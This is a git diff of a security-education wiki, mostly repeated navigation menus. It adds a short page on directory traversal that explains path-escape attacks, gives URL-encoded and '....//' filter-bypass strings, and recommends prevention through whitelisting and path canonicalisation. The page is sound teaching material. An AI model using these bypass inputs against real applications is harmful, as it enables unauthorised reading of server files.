          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Overview

- - diff --git a/docs/Exploitation/Web/Cross-Site Request Forgery.html b/docs/Exploitation/Web/Cross-Site Request Forgery.html index ef62fc79..0e239613 100644 --- a/docs/Exploitation/Web/Cross-Site Request Forgery.html +++ b/docs/Exploitation/Web/Cross-Site Request Forgery.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -216,22 +216,6 @@

Hunting for X - - diff --git a/docs/Exploitation/Web/Directory Traversal.html b/docs/Exploitation/Web/Directory Traversal.html new file mode 100644 index 00000000..596b50cb --- /dev/null +++ b/docs/Exploitation/Web/Directory Traversal.html @@ -0,0 +1,208 @@ + + + + + + Directory Traversal - The Cyberclopaedia + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +
+ + + + + + + + +
+
+ +

Directory Traversal

+

A directory traversal (also known as path traversal) is a type of attack which allows an adversary to access files outside the web root directory and usually occurs when there is no proper user input sanitisation.

+

If an application is vulnerable to path traversal, then one can abuse relative paths to escape from the web root and access arbitrary files on the file system.

+

+

One should look for directory traversals anywhere that they see a filename - this can be in a URL parameter, in the URL path itself or in any additional resources that the application loads.

+

Filter Bypass

+

URL encoding can be used to bypass many filters which try to filter out the ../ sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the . character is %2e and the / character gets encoded to %2f. The whole sequence can therefore be represented as %2e%2e%2f.

+

Some filters try to strip out the ../ sequence before handling requests. Oftentimes, however, these filters are non-recursive and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence ....// will be changed to ../ after the middle ../ is removed.

+

Prevention

+

One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones.

+

After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. Ultimately, one should verify that this canonical path begins with the base directory.

+ +
+
+ +
+ + +
+ + + + + + + + + + + + + + + + + + + + diff --git a/docs/Exploitation/Web/HTTP Parameter Pollution.html b/docs/Exploitation/Web/HTTP Parameter Pollution.html index 52c57d25..07ab052d 100644 --- a/docs/Exploitation/Web/HTTP Parameter Pollution.html +++ b/docs/Exploitation/Web/HTTP Parameter Pollution.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
